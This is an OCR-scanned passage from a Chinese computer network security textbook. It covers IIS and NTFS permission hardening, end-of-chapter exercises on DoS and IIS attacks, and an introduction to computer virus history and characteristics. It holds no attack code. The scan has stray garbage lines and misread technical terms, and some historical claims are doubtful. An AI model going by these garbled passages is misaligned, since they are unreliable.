击 “ 确 定 ” 按 钮 ， 同 样 地 ， 我 们 可 以 将 “Security”、“Application” 下 面 的 “File” 键 值 一 
“E:\aaa\bbb\AppEventEvt”， 最 后 按 一 下 键盘 中 的 


次 修改 为 “E:\aaa\bbb\SecEvent.Evt”、 
F5 功能 键 刷新 一 下 系统 注册 表 ， 就 能 使 系统 日 志文 件 的 关联 设置 生效 了 。 
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实 训 二 ”1IS Web 服务 器 的 权限 设置 


1. 实 训 目的 

掌握 NTFS 文件 系统 本 身 的 权限 设置 。 

掌握 IS 权限 设置 。 

2. 实 训 要 求 

安装 Windows 2003 Server 操作 系统 计算 机 。 
3. 实 训 步 又 


(1) ASP、PHP、ASPNET 程序 所 在 目录 的 权限 设置 。 

如 果 这 些 程序 是 要 执行 的 ， 那 么 需要 设置 “ 读 取 ”权限 ， 如 图 3-13 所 示 ， 并 且 设置 执 
行 权限 为 “ 纯 脚本 ”。 不 要 设置 “ 写 入 ”和 “脚本 资源 访问 ”， 更 不 要 设置 执行 权限 为 “ 纯 
脚本 和 可 执行 程序 ”， 如 图 3-14 所 示 。 
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图 3-13 网 站 文件 夹 属性 
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图 3-14 IIS 属性 


中 萝 ? 章 大 纺 希 务 与 二 府 库 安 全 


NTFS 权限 中 不 要 给 IS_WPG 用 户 组 和 Internet 来 宾 账 号 设置 写 和 修改 权限 。 如 果 有 
一 些 特殊 的 配置 文件 (而 且 配 置 文件 本 身 也 是 ASP、PHP 程序 )， 则 需要 给 这 些 特定 的 文件 
配置 NTFS 权限 中 的 Intemet 来宾 账号 ASPNET 程序 是 ITS_WPG 组 ) 的 写 权限 , 而 不 要 配 
置 IS 属性 面板 中 的 “ 写 入 ”权限 。 
(2) 上 传 目 录 的 权限 设置 。 
网 站 上 可 能 会 设置 一 个 或 几 个 目录 允许 上 传 文件 ， 上 传 的 方式 一 般 是 通过 ASP、PHP、 
ASP.NET 等 程序 来 完成 。 一 定 要 将 上 传 目录 的 执行 权限 设 为 “无 ”， 这 样 即使 上 传 了 ASP、 
PHP 等 脚本 程序 或 者 exe 程序 ， 也 不 会 在 用 户 浏览 器 里 就 触发 执行 ， 如 图 3-15 所 示 。 
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图 3-15 上 传 文件 夹 属性 


(3) Access 数据 库 所 在 目录 的 权限 设置 。 

IIS 用 户 一 般 将 Access 数据 库 改 名 ( 改 为 asp 或 者 aspx 后 绥 等 ), 或 者 放 在 发 布 目录 之 外 
的 方法 来 避免 浏览 者 下 载 他 们 的 Access 数据 库 。 此 时 只 需要 将 Access 所 在 目录 (或 者 该 文 
件 ) 的 “ 读 取 ”、“ 写 入 ”权限 都 去 掉 即 可 ， 如 图 3-16 所 示 。 
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图 3-16 lIS 数据库 属性 


不 必 担 心 这 样 一 来 程序 会 无 法 读 取 和 写 入 你 的 Access 数据 库 ， 因 为 程序 需要 的 
是 NTFS 上 Internet 来 宾 账 号 或 IS_WPG 组 账号 的 权限 ， 只 要 将 这 些 用 户 的 权限 设置 为 可 
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读 可 写 就 完全 可 以 保证 你 的 程序 能 够 正确 运行 了 。 

(4) 其 他 目录 的 权限 设置 。 

网 站 下 有 纯 图 片 目 录 、 纯 html 模板 目录 、 纯 客户 端 js 文件 目录 或 者 样式 表 目 录 等 ,这 
些 目录 只 需要 设置 “ 读 取 ” 权 限 即 可 ， 执 行 权 限 设 成 “无 ” 即 可 。 其 他 权限 一 概 不 需要 设 
置 ， 如 图 3-17 所 示 。 
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图 3-17 图 片 文件 夹 属性 


本 章 习 题 
一 、 选 择 题 
1. 攻击 者 通过 使 用 软件 破坏 网 络 、 系 统 资源 和 服务 属于 ( ) 攻 击 。 
A. 硬件 攻击 B. 软件 攻击 C. 主机 型 攻击 D. 应 用 性 攻击 
2. 攻击 者 试图 消耗 目标 主机 的 网 络 带宽 、 内 存 等 合法 资源 属于 ( ”) 攻 击 。 
让 A. 主机 型 攻击 ” B. 软件 攻击 C. 资源 消耗 D. 物理 破坏 
首 3. 采用 三 次 握手 的 方法 的 攻击 类 型 是 ( )。 
专 A.Land 程序 攻击 B. SYN flood 攻击 
立 C. 卫 欺骗 D. 泪 滴 攻 击 
长 4. 攻击 者 可 以 利用 (  ”) 漏 洞 获取 Web 服务 器 的 System 权限 来 访问 远程 系统 。 
材 A. .ida&.idq 漏洞 B. .printer 漏洞 
C. WebDAYV 漏洞 D. Unicode 漏洞 
半 5. 入 侵 者 可 以 利用 ( 。””) 漏 洞 以 Local System 的 权限 在 主机 上 执行 命令 。 
机 A. .ida&.idq 漏洞 B. printer 漏洞 
四 C. WebDAYV 漏洞 D. Unicode 漏洞 
| 6.(  ) 漏 洞 使 得 电子 邮件 服务 器 容易 受到 缓冲 区 溢出 等 类 型 的 攻击 。 
A. DoS 攻击 B. IMAP 和 了 POP 漏洞 
C. 系统 漏洞 D. 特洛伊 木马 


@ 


中 萝 了 章 ， 因 纺 希 务 与 二 府 库 安 全 


7. 入 侵 者 获取 SQL Server 的 账号 密码 的 方法 有 ( ”)。( 多 选 ) 

A. 弱 口 令 扫描 B. 暴力 破解 C. 木马 D. 社会 工程 学 
8. ”由 数据 库 角 色 来 对 指定 数据 库 中 的 对 象 定义 访问 权限 属于 ( ”) 安 全 层次 。 

A. 第 0 级 B. 第 一 级 Cr D. 第 三 级 
二 、 填 空 题 

拒绝 服务 攻击 DoS 按 攻击 目标 可 以 分 为 和 


! | 
2. 拒绝 服务 攻击 DoS 按 受害 者 类 型 可 分 为 和 

3. ”拒绝 服务 攻击 DoS 按 攻击 方式 可 分 为 . 和 
4. 


常见 的 DoS 攻击 有 和 ly 和 


5. DDoS 所 包含 的 三 个 层次 是 5 ; 
6. 常见 的 IIS 漏洞 有 和 
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增强 注册 表 安 全 性 的 方法 是 和 
. 数据 模型 的 两 种 类 型 是 和 

三 、 简 答题 

1. 什么 是 拒绝 服务 ? 常见 的 拒绝 服务 有 哪些 ? 

2. 举 个 拒绝 服务 的 实例 ， 并 通过 实验 验证 。 

3. 如 何 防守 IS 入 侵 ? 并 简 述 IIS 的 安全 解决 方案 。 

4. 注册 表 是 Windows 操作 系统 的 核心 ， 但 是 在 默认 情况 下 ， 所 有 基于 Windows 系 
统 的 注册 表 在 网 络 上 都 可 以 被 访问 到 。 了 解 这 一 点 的 黑客 完全 可 以 利用 这 个 安全 漏洞 来 对 
你 公司 的 计算 机 系统 进行 攻击 ， 试 问 ， 如 何 禁 止 对 注册 表 的 远程 访问 ? 

5. 简 述 Telnet 的 入 侵 方式 。 如 何 才能 抵御 Telnet 入 侵 ? 

6. ”如 何在 远程 主机 上 建立 后 门 账号 ? 

7. 局 域 网 中 的 MSSQL 服务 器 在 什么 情况 下 能 够 被 SQL ServerSniffer 噢 探 到 ?应 该 
如 何 防范 ? 


第 4 章 计算 机 病毒 与 木马 


【本 章 要 点 】 
通过 本 章 的 学 习 ， 可 以 了 解 计算 机 病毒 的 定义 。 掌 握 计 算 机 病毒 特征 以 及 检测 、 防 范 
等 技术 。 初 步 了 解 木马 攻击 的 技术 、 特 点 。 


4.1 计算 机 病毒 概述 


计算 机 病毒 是 一 个 程序 、 一 段 可 执行 码 。 它 们 就 像 生 物 病毒 一 样 ， 有 其 独特 的 复制 能 
力 ， 可 以 很 快 地 蔓延 ， 又 常常 难以 根除 。 它 们 能 把 自身 附着 在 各 种 类 型 的 文件 上 ， 当 文件 
被 复制 或 从 一 个 用 户 传送 到 另 一 个 用 户 时 ， 就 随同 文件 一 起 蔓延 开 来 。 

除 复制 能 力 外 ， 某 些 计算 机 病毒 还 有 其 他 一 些 共同 特性 : 一 个 被 污染 的 程序 能 够 传送 
病毒 载体 。 
可 以 从 不 同 角度 给 出 计算 机 病毒 的 定义 。 

(1) 通过 磁盘 、 磁 带 和 网 络 等 作为 媒介 传播 扩散 ， 能 “传染 ”其 他 程序 的 一 种 程序 。 

(2) 能 够 实现 自身 复制 且 借助 一 定 的 载体 存在 的 具有 潜伏 性 、 传 染 性 和 破坏 性 的 程序 。 

G) 是 一 种 人 为 制造 的 程序 , 它 通过 不 同 的 途径 潜伏 或 寄生 在 存储 媒体 (如 磁盘 、 内 存 ) 
或 程序 里 ， 当 某 种 条 件 或 时 机 成 熟 时 ， 它 会 自生 复制 并 传播 ， 使 计算 机 的 资源 受到 不 同 程 
度 的 破坏 。 

计算 机 病毒 同 生物 病毒 相似 之 处 是 能 够 侵入 计算 机 系统 和 网 络 ， 和 危害 正常 工作 的 “ 病 
原 体 ”。 它 能 够 对 计算 机 系统 进行 各 种 破坏 ， 同 时 能 够 自我 复制 ， 具 有 传染 性 。 

与 生物 病毒 不 同 的 是 ， 几 乎 所 有 的 计算 机 病毒 都 是 人 为 地 故意 制造 出 来 的 ， 有 时 一 旦 
扩散 出 来 后 连 编者 自己 也 无 法 控制 ， 因 此 它 已 经 不 是 一 个 简单 的 纯 计算 机 学 术 问题 ， 而 是 
一 个 严重 的 社会 问题 。 

目前 ， 计 算 机 病毒 主要 有 以 下 几 种 传播 方式 。 

(1) 通过 电子 邮件 进行 传播 。 病 毒 附着 在 电子 邮件 中 ， 一 旦 用 户 打开 电子 邮件 ， 病 毒 
就 会 被 激活 并 感染 计算 机 ， 并 对 本 地 计算 机 进行 一 些 有 危害 性 的 操作 。 常 见 的 电子 邮件 病 
毒 一 般 由 合作 单位 或 个 人 通过 E-mail 上 报 、FTP 上 传 、Web 提交 而 导致 病毒 在 网 络 中 传播 。 
这 种 病毒 ， 在 几 分 钟 内 就 可 以 浸染 整个 企业 ， 让 公司 每 年 在 生产 损失 和 清除 病毒 开销 上 花 
费 高 达 数 百 万 美元 ， 甚 至 更 高 的 费用 。 

(2) 利用 系统 漏洞 进行 传播 。 由 于 操作 系统 固有 的 一 些 设计 缺陷 ， 导 致 被 恶意 用 户 通 
过 畸形 的 方式 利用 后 ， 可 执行 任意 代码 ， 这 就 是 系统 漏洞 。 病 毒 往往 利用 系统 漏洞 进入 系 
统 ， 达 到 传播 的 目的 。 

G3) 通过 MSN、 QQ 等 即时 通信 软件 进行 传播 。 有 时 候 频繁 地 打开 即时 通信 工具 传 来 
的 网 址 、 来 历 不 明 的 邮件 及 附件 以 及 到 不 安全 的 网 站 下 载 可 执行 程序 等 ， 都 会 导致 网 络 病 
毒 进 入 计算 机 。 现 在 很 多 木马 病毒 可 以 通过 MSN、 QQ 等 即时 通信 软件 进行 传播 ， 一 旦 你 
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的 在 线 好 友 感 染病 毒 ， 那 么 所 有 好 友 将 会 遭 到 病毒 的 入 侵 。 

(4) 通过 网 页 进行 传播 。 网 页 病毒 主要 是 利用 软件 或 系统 操作 平台 等 的 安全 漏洞 ， 通 
过 执行 嵌入 在 网 页 HTML 超 文本 标记 语言 内 的 Java Applet 小 应 用 程序 ，JavaScript 脚本 语 
言 程序 , ActiveX 软件 部 件 网 络 交互 技术 支持 可 自动 执行 的 代码 程序 , 以 强行 修改 用 户 操作 
系统 的 注册 表 设 置 及 系统 实用 配置 程序 ， 给 用 户 系统 带 来 不 同 程 度 的 破坏 。 

(5) 通过 移动 存储 设备 进行 传播 。 移 动 存储 设备 包括 常见 的 光盘 、 移 动 硬盘 、U 盘 ( 含 
数码 相机 、MP3 等 )， 病 毒 通过 这 些 移 动 存储 设备 在 计算 机 间 进 行 传播 。 

今后 任何 时 候 病毒 都 不 会 很 快 地 消失 ， 并 呈现 快速 增长 的 态势 。 仅 在 2013 年 1 至 
6 月 ， 瑞 星 “ 云 安全 ”系统 共 截获 新 增 病毒 样本 1 633 万 余 个 ， 病 毒 总 体 数量 比 2012 年 下 
半年 增长 93.01%， 呈 现 出 一 个 爆发 式 的 增长 态势 。 


4.1.1 计算 机 病毒 的 起 源 


自从 1987 年 发 现 了 全 世界 首 例 计算 机 病毒 以 来 , 计算 机 病毒 的 数量 早已 超过 1 万 种 以 
上 ， 并 且 还 在 以 每 年 两 千 种 新 病毒 的 速度 递增 ， 不 断 困扰 着 涉及 计算 机 领域 的 各 个 行业 。 
计算 机 病毒 的 危害 及 造成 的 损失 是 众所周知 的 ， 发 明 计算 机 病毒 的 人 同样 也 受到 社会 和 公 
众 与 论 的 谴责 。 也 许 有 人 会 问 : “计算 机 病毒 是 哪 位 先生 发 明 的 ? ”这 个 问题 至 今 无 法 说 
清楚 ， 但 是 有 一 点 可 以 肯定 ， 即 计算 机 病毒 的 发 源 地 是 科技 最 发 达 的 美国 。 

下 面 简单 介绍 一 下 几 种 起 源 说 。 

1) “科学 幻想 起 源 说 

1975 年 ， 美 国 科普 作家 约翰 。 布 鲁 勒 尔 写 了 一 本 名 为 《冲击 波 骑士 》 的 书 ， 该 书 第 一 
次 描写 了 在 信息 社会 中 ， 计 算 机 作为 正义 和 政 恶 双方 斗争 的 工具 的 故事 。 

2) “恶作剧 起 源 说 

恶作剧 者 大 都 是 那些 对 计算 机 知识 和 技术 非常 感 兴趣 的 人 ， 并 且 特 别 热衷 于 那些 别人 
认为 是 不 可 能 做 成 的 事情 。 这 些 人 或 是 要 显示 一 下 自己 在 计算 机 知识 方面 的 天 资 ， 或 是 要 
报复 一 下 别人 或 公司 。 前 者 是 无 恶意 的 ， 所 编写 的 病毒 也 大 多 不 是 恶意 的 ， 只 是 显示 一 下 
自己 的 才能 以 达到 炫 钦 的 目的 。 例 如 ， 美 国 网 络 蠕虫 病毒 的 编写 者 英里 斯 实际 上 就 属于 此 
类 恶作剧 者 ， 因 为 在 他 编写 这 个 旨 在 渗透 到 美国 国防 部 的 计算 机 病毒 之 时 ， 也 没有 考虑 到 
这 种 计算 机 病毒 会 给 美国 带 来 巨大 的 损失 。 而 后 者 则 大 多 是 恶意 的 报复 ， 想 从 受 损 失 一 方 
的 痛苦 中 取得 乐趣 ， 以 泄 私 愤 。 

虽然 ， 计 算 机 病毒 的 起 源 是 否 归 结 于 恶作剧 者 还 不 能 够 确定 ， 但 可 以 肯定 ， 世 界 上 流 
行 的 许多 计算 机 病毒 都 是 恶作剧 的 产物 。 

3) ”游戏 程序 起 源 说 

十 几 年 前 ， 计 算 机 在 社会 上 还 没有 得 到 广泛 的 普及 应 用 ， 美 国 贝尔 实验 室 的 程序 员 为 
了 娱乐 , 在 自己 实验 室 的 计算 机 上 编制 了 吃 掉 对 方程 序 的 程序 , 看 谁 先 把 对 方 的 程序 吃 光 。 
有 人 认为 这 是 世界 上 第 一 个 计算 机 病毒 ， 但 这 只 是 一 个 猜想 而 已 。 

制造 计算 机 病毒 的 罪魁 祸首 到 底 是 谁 ， 到 目前 为 止 ， 依 然 众说 纷 绒 。1983 年 11 月 3 
日 美国 计算 机 专家 弗 莱 德 。 科 恩 在 美国 国家 计算 机 安全 会 议 上 ， 演 示 了 他 研制 的 一 种 在 运 
行 过 程 中 可 以 复制 自身 的 破坏 性 程序 ， 沦 ， 艾 德 勒 曼 将 它 命名 为 计算 机 病毒 ， 并 在 每 周 召 


© 


(> 计算 机 网 络 安全 第 2 版 


涪 洲 藻 兰 车 过 潍 式 襄 村 册 到 当 卫 


开 一 次 的 计算 机 安全 讨论 会 上 正式 提出 来 ，8 小 时 后 专家 们 在 VAXIL750 计算 机 系统 上 运 
行 ， 第 一 个 病毒 实验 成 功 。 一 周 后 获准 进行 实验 演示 ， 从 而 在 实验 上 证 实 了 计算 机 病毒 的 
存在 ， 这 就 是 世界 上 第 一 例 被 证 实 的 计算 机 病毒 。 

病毒 的 发 展 史 呈 现 一 定 的 规律 性 , 一 般 情况 是 新 的 病毒 技术 出 现 后 , 病毒 会 迅速 发 展 ， 
接着 反 病 毒 技 术 的 发 展会 抑制 其 流传 。 操 作 系统 升级 后 ， 病 毒 也 会 调整 为 新 的 方式 ， 产 生 
新 的 病毒 技术 。IT 行业 普遍 认为 ， 从 最 原始 的 单机 磁盘 病毒 到 现在 逐步 进入 人 们 视野 的 手 
机 病毒 ， 计 算 机 病毒 主要 经 历 了 六 个 重要 的 发 展 阶段 。 

第 一 阶段 为 原始 病毒 阶段 。 产 生年 限 一 般 认 为 在 1986 一 1989 年 ， 由 于 当时 计算 机 的 应 
用 软件 少 ， 而 且 大 多 是 单机 运行 ， 因 此 病毒 没有 大 量 流行 ， 种 类 也 很 有 限 ， 病 毒 的 清除 工 
作 相 对 来 说 较 容 易 。 其 主要 特点 是 : 攻击 目标 较 单一 ， 主 要 通过 截获 系统 中 断 向 量 的 方式 
监视 系统 的 运行 状态 ， 并 在 一 定 的 条 件 下 对 目标 进行 传染 ， 病 毒 程 序 不 具有 自我 保护 的 措 
施 ， 容 易 被 人 们 分 析 和 解剖 。 

第 二 阶段 为 混合 型 病毒 阶段 。 其 产生 的 年 限 在 1989 一 1991 年 ,是 计算 机 病毒 由 简单 发 
展 到 复杂 的 阶段 。 计 算 机 局 域 网 开始 应 用 与 普及 ， 给 计算 机 病毒 带 来 了 第 一 次 流行 高 峰 。 
这 一 阶段 病毒 的 主要 特点 为 :攻击 目标 趋 于 混合 ， 采 取 更 为 隐蔽 的 方法 驻 留 内 存 和 传染 目 
标 ， 病 毒 传染 目标 后 没有 明显 的 特征 ， 病 毒 程序 往往 采取 了 自我 保护 措施 ， 出 现 许 多 病毒 
的 变种 等 。 

第 三 阶段 为 多 态 性 病毒 阶段 。 此 类 病毒 的 主要 特点 是 ， 在 每 次 传染 目标 时 ， 放 入 宿主 
程序 中 的 病毒 程序 大 部 分 都 是 可 变 的。 因此 使 防 病毒 软件 的 查 杀 变 得 非常 困难 。 如 1994 年 
在 国内 出 现 的 “幽灵 ”病毒 就 属于 这 种 类 型 。 这 一 阶段 病毒 技术 开始 向 多 维 化 方向 发 展 。 

第 四 阶段 为 网 络 病毒 阶段 。 从 20 世纪 90 年 代 中 后 期 开始 ， 随 着 国际 互联 网 的 发 展 
壮大 ， 依 赖 互联 网 络 传播 的 邮件 病毒 和 宏 病 毒 等 大 量 涌现 ， 病 毒 传播 快 、 隐 项 性 强 、 破 坏 
性 大 。 也 就 是 从 这 一 阶段 开始 ， 反 病毒 产业 开始 萌芽 并 逐步 形成 一 个 规模 宏大 的 新 兴 产 业 。 

第 五 阶段 为 主动 攻击 型 病毒 。 典 型 代表 为 2003 年 出 现 的 “冲击 波 ”病毒 和 2004 年 流 
行 的 “震荡 波 ” 病 毒 。 这 些 病毒 利用 操作 系统 的 漏洞 进行 进攻 性 的 扩散 ， 并 不 需要 任何 媒 
介 或 操作 ， 用 户 只 要 接 入 互联 网 络 就 有 可 能 被 感染 。 正 因为 如 此 ， 该 病毒 的 危害 性 更 大 。 

第 六 阶段 为 “移动 终端 病毒 ”阶段 。 随 着 移动 通信 和 网络 的 发 展 以 及 移动 终端 (智能 
手机 、 平 板 电脑 等 ) 一 一 移动 终端 功能 的 不 断 强大 ， 计 算 机 病毒 开始 从 传统 的 互联 网 络 走 进 
移动 通信 网 络 世界 。 与 互联 网 用 户 相 比 ， 移 动 终端 用 户 覆盖 面 更 广 、 数 量 更 多 ， 因 而 高 性 
能 的 移动 终端 病毒 一 旦 爆发 ， 其 危害 和 影响 比 “ 冲 击 波 ”“ 震 荡 波 ”等 互联 网 病毒 的 破坏 
力 还 要 大 。 


4.1.2 ”计算 机 病毒 的 定义 及 特征 


计算 机 病毒 是 指 编制 或 者 在 计算 机 程序 中 插入 的 破坏 计算 机 功能 或 者 破坏 数据 ， 影 响 
计算 机 使 用 并 且 能 够 自我 复制 的 一 组 计算 机 指令 或 者 程序 代码 。 计 算 机 病毒 的 根本 属性 是 
自我 复制 和 破坏 性 。 


1. 计算 机 病毒 的 定义 
计算 机 病毒 (Computer Virus) 在 《中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 例 》 中 被 
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明确 定义 ， 病 毒 指 “编制 或 者 在 计算 机 程序 中 插入 的 破坏 计算 机 功能 或 者 破坏 数据 ， 影 响 
计算 机 使 用 并 且 能 够 自我 复制 的 一 组 计算 机 指令 或 者 程序 代码 ”。 


2. 计算 机 病毒 的 产生 


病毒 不 是 来 源 于 突 发 或 偶然 的 原因 。 一 次 突 发 的 停电 和 偶然 的 错误 ， 会 在 计算 机 的 磁 
盘 和 内 存 中 产生 一 些 乱 码 和 随机 指令 ， 但 这 些 代码 是 无 序 和 混乱 的 ， 病 毒 则 是 一 种 比较 完 
美 、 精 巧 、 严 谨 的 代码 ， 按 照 严 格 的 秩序 组 织 起 来 ， 与 所 在 的 系统 网 络 环境 相 适 应 和 配合 
起 来 。 病 毒 不 会 通过 偶然 形成 ， 并 且 需 要 有 一 定 的 长 度 ， 这 个 基本 的 长 度 从 概率 上 来 讲 是 
不 可 能 通过 随机 代码 产生 的 。 病 毒 是 人 为 的 特制 程序 ， 多 数 病毒 可 以 找到 作者 信息 和 产地 
信息 ， 通 过 大 量 的 资料 分 析 统 计 来 看 ， 病 毒 作 者 的 主要 情况 和 目的 是 : 一 些 天 才 的 程序 员 
为 了 表现 自己 和 证 明 自己 的 能 力 、 处 于 对 上 司 的 不 满 、 为 了 好 奇 、 为 了 报复 、 为 了 祝贺 和 
求爱 、 为 了 得 到 控制 口令 、 为 了 软件 拿 不 到 报酬 预 留 的 陷阱 等 ， 当 然 也 有 因 政 治 、 军 事 、 
宗教 、 民 族 、 专 利 等 方面 的 需求 而 专门 编写 的 ， 其 中 也 包括 一 些 病毒 研究 机 构 和 黑客 的 测 
试 病毒 。 


3. 计算 机 病毒 的 特点 


计算 机 病毒 是 人 为 的 特制 程序 ， 具 有 自我 复制 能 力 、 很 强 的 感染 性 、 一 定 的 潜伏 性 、 
特定 的 触发 性 和 很 大 的 破坏 性 。 计 算 机 的 信息 需要 存 取 、 复 制 与 传送 。 病 毒 作为 信息 的 一 
种 形式 可 以 随 之 繁殖 、 感 染 和 破坏 ， 而 当 病 毒 取得 控制 权 之 后 ， 他 们 会 主动 寻找 感染 目标 ， 
使 自身 广 为 流 传 。 

1) ”计算 机 病毒 的 程序 性 (可 执行 性 ) 

计算 机 病毒 与 其 他 合法 程序 一 样 ， 是 一 段 可 执行 程序 ， 但 它 不 是 一 个 完整 的 程序 ， 而 
是 寄生 在 其 他 可 执行 程序 上 ， 因 此 它 享 有 一 切 程序 所 能 得 到 的 权利 。 在 病毒 运行 时 ， 与 合 
法 程序 争夺 系统 的 控制 权 。 计 算 机 病毒 只 有 当 它 在 计算 机 内 得 以 运行 时 ， 才 具有 传染 性 和 
破坏 性 等 活性 ， 也 就 是 说 计算 机 CPU 的 控制 权 是 关键 问题 。 若 计算 机 在 正常 程序 控制 下 运 
行 ， 而 不 运行 带 病毒 的 程序 ， 则 这 人 台 计 算 机 总 是 可 靠 的 。 在 这 台 计算 机 上 可 以 查看 病毒 文 
件 的 名 字 ， 查 看 计算 机 病毒 的 代码 ， 打 印 病毒 的 代码 ， 甚 至 复制 病毒 程序 ， 却 都 不 会 感染 
病毒 。 反 病毒 技术 人 员 整 天 就 是 在 这 样 的 环境 下 工作 ， 他 们 的 计算 机 虽 也 存 有 各 种 计算 机 
病毒 的 代码 ， 但 已 置 这 些 病毒 于 控制 之 下 ， 计 算 机 不 会 运行 病毒 程序 ， 整 个 系统 是 安全 的 。 
相反 ， 计 算 机 病毒 一 经 在 计算 机 上 运行 ， 在 同一 台 计算 机 内 病毒 程序 与 正常 系统 程序 或 某 
种 病毒 与 其 他 病毒 程序 争夺 系统 控制 权时 ， 往 往 会 造成 系统 崩溃 ， 导 致 计算 机 竣 羔 。 反 病 
毒 技 术 就 是 要 提前 取得 计算 机 系统 的 控制 权 ， 识 别 出 计 算 机 病毒 的 代码 和 行为 ， 阻 止 其 取 
得 系统 控制 权 ， 反 病毒 技术 的 优 务 就 是 体现 在 这 一 点 上 。 一 个 好 的 抗 病毒 系统 应 该 不 仅 能 
可 靠 地 识别 出 已 知 计算 机 病毒 的 代码 ， 阻 止 其 运行 ， 还 应 该 识别 出 未 知 计算 机 病毒 在 系统 
内 的 行为 ,阻止 其 传染 和 破坏 系统 的 行动 。 

2) ”计算 机 病毒 的 传染 性 

计算 机 病毒 通过 各 种 渠道 从 已 被 感染 的 计算 机 扩散 到 未 被 感染 的 计算 机 ， 在 某 些 情况 
下 会 造成 被 感染 的 计算 机 工作 失常 甚至 瘫痪 。 计 算 机 病毒 是 一 段 人 为 编制 的 计算 机 程序 代 
码 ， 这 段 程序 代码 一 旦 进入 计算 机 并 得 以 执行 ， 它 就 会 搜索 其 他 符合 其 传染 条 件 的 程序 或 
存储 介质 ， 确 定 目标 后 再 将 自身 代码 插入 其 中 ， 达 到 自我 繁殖 的 目的 。 只 要 有 一 台 计算 机 
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染 毒 ， 如 不 及 时 处 理 ， 那 么 病毒 会 在 这 台 计 算 机 上 迅速 扩散 ， 其 中 的 大 量 文件 (一 般 是 可 执 
行文 件 ) 会 被 感染 。 而 被 感染 的 文件 又 成 了 新 的 传染 源 ， 它 在 与 其 他 机 器 进行 数据 交换 或 通 
过 网 络 接触 ， 病 毒 会 继续 进行 传染 。 
正常 的 计算 机 程序 一 般 是 不 会 将 自身 的 代码 强行 连接 到 其 他 程序 上 的 ， 而 病毒 却 能 
自身 的 代码 强行 传染 到 一 切 符合 其 传染 条 件 的 未 受到 传染 的 程序 上 。 计 算 机 病毒 可 通过 各 
种 可 能 的 渠道 ， 如 器 盘 、 计 算 机 网 络 去 传染 其 他 的 计算 机 。 当 在 一 台 机 器 上 发 现 病毒 时 
往往 曾 在 这 台 计 算 机 上 用 过 的 软盘 已 被 感染 了 病毒 ， 而 与 这 台 机 器 相 联 网 的 其 他 计算 机 可 
能 也 染 上 了 该 病毒 。 是否 具有 传染 性 是 判别 一 个 程序 是 否 为 计算 机 病毒 的 最 重要 条 件 。 病 
毒 程序 通过 修改 磁盘 扇 区 信息 或 文件 内 容 并 把 自身 嵌入 其 中 以 达到 病毒 的 传染 和 扩散 ， 被 
嵌入 的 程序 叫 作 宿主 程序 。 

3) ”计算 机 病毒 的 潜伏 性 

计算 机 病毒 程序 进入 系统 之 后 不 会 马上 发 作 ， 可 以 在 几 周 或 者 几 个 月 甚至 几 年 内 隐藏 
合法 文件 中 ， 对 其 他 系统 进行 传染 ， 而 不 被 人 发 现 ; 潜伏 性 越 好 ， 其 在 系统 中 的 存在 时 
间 就 会 越 长 ， 病 毒 的 传染 范围 就 会 越 大 。 

潜伏 性 的 第 一 种 表现 是 ， 病毒 程序 不 用 专用 检测 程序 是 检查 不 出 来 的 。 因 此 病毒 可 以 
静 静 地 躲 在 磁盘 或 磁带 里 待 上 几 天 ， 甚 至 几 年 ， 一 旦 时 机 上 成熟， 得 到 运行 机 会 ， 就 要 四 处 
繁殖 、 扩 散 。 潜 伏 性 的 第 二 种 表现 是 : 计算 机 病毒 的 内 部 往往 有 一 种 触发 机 制 ， 不 满足 触 
发 条 件 时 ， 计 算 机 病毒 除了 传染 外 不 做 什么 破坏 。 触 发 条 件 一 旦 得 到 满足 ， 就 会 发 作 。 表 
现 各 不 相同 ， 有 的 在 屏幕 上 显示 信息 、 图 形 或 特殊 标识 ， 有 的 则 执行 破坏 系统 的 操作 ， 如 
格式 化 磁盘 、 删 除 磁盘 文件 、 对 数据 文件 做 加 密 、 封 锁 键 盘 以 及 使 系统 死 锁 等 。 

区 ”计算 机 病毒 的 可 触发 性 

病毒 因 某 个 事件 或 数值 的 出 现 ， 诱 使 病毒 实施 感染 或 进行 攻击 的 特性 称 为 可 触发 性 。 
为 了 隐蔽 自己 ， 病 毒 必须 潜伏 ， 少 做 动作 。 如 果 完 全 不 动 ， 一 直 潜 伏 的 话 ， 病 毒 既 不 能 感 
染 也 不 能 进行 破坏 ， 便 失去 了 杀伤 力 。 病 毒 既 要 隐蔽 又 要 维持 杀伤 力 ， 它 必须 具有 可 触发 
性 。 病 毒 的 触发 机 制 就 是 用 来 控制 感 当 和 破坏 动作 的 频率 。 病 毒 具有 预定 的 触发 条 件 ， 这 
些 条 件 可 能 是 时 间 、 上 日期、 文件 类 型 或 某 些 特定 数据 等 。 病 毒 运行 时 ， 触 发 机 制 检查 预定 
条 件 是 否 满足 ， 如 果 满 足 ， 启 动感 染 或 破坏 动作 ， 使 病毒 进行 感染 或 攻击 ;如果 不 满足 则 
使 病毒 继续 潜伏 。 

5) ”计算 机 病毒 的 破坏 性 

所 有 的 计算 机 病毒 都 是 一 种 可 执行 程序 ， 而 这 一 可 执行 程序 又 必然 要 运行 ， 所 以 对 系 
统 来 讲 ， 所 有 的 计算 机 病毒 都 存在 一 个 共同 的 危害 ， 即 降低 计算 机 系统 的 工作 效率 ， 占 用 
系统 资源 ， 其 具体 情况 取决 于 入 侵 系统 的 病毒 程序 。 同 时 计算 机 病毒 的 破坏 性 主要 取决 于 
计算 机 病毒 设计 者 的 目的 ， 如 果 病 毒 设计 者 的 目的 在 于 彻底 破坏 系统 的 正常 运行 的 话 ， 那 
么 这 种 病毒 对 于 计算 机 系统 进行 攻击 造成 的 后 果 是 难以 设想 的 ， 它 可 以 毁 掉 系统 的 部 分 数 
据 ， 也 可 以 破坏 全 部 数据 并 使 之 无 法 恢复 。 但 并 非 所 有 的 病毒 都 对 系统 产生 极其 恶劣 的 破 
坏 作用 。 有 时 几 种 本 没有 多 大 破坏 作用 的 病毒 交叉 感染 ， 也 会 导致 系统 崩溃 等 重大 恶果 。 

6) ”病毒 攻击 的 主动 性 

病毒 对 系统 的 攻击 是 主动 的 , 不 以 人 的 意志 为 转移 的 。 也 就 是 说 ， 从 一 定 的 程度 上 讲 ， 
计算 机 系统 无 论 采取 多 么 严密 的 保护 措施 都 不 可 能 彻底 地 排除 病毒 对 系统 的 攻击 ， 而 保护 
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措施 也 只 是 一 种 预防 的 手段 而 已 。 

7) “病毒 的 针对 性 

计算 机 病毒 是 针对 特定 的 计算 机 和 特定 的 操作 系统 的 。 例 如 ， 有 针对 IBM PC 机 及 其 
